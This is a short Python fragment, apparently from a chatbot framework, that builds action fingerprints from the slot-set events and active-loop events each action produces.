        slot_keys = {e.key for e in events if isinstance(e, SlotSet)}
        loop_names = {e.name for e in events if isinstance(e, ActiveLoop)}
        fingerprints[action_name] = ActionFingerprint(
            list(slot_keys & featurized_slots), list(loop_names)
        )
    return fingerprints
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.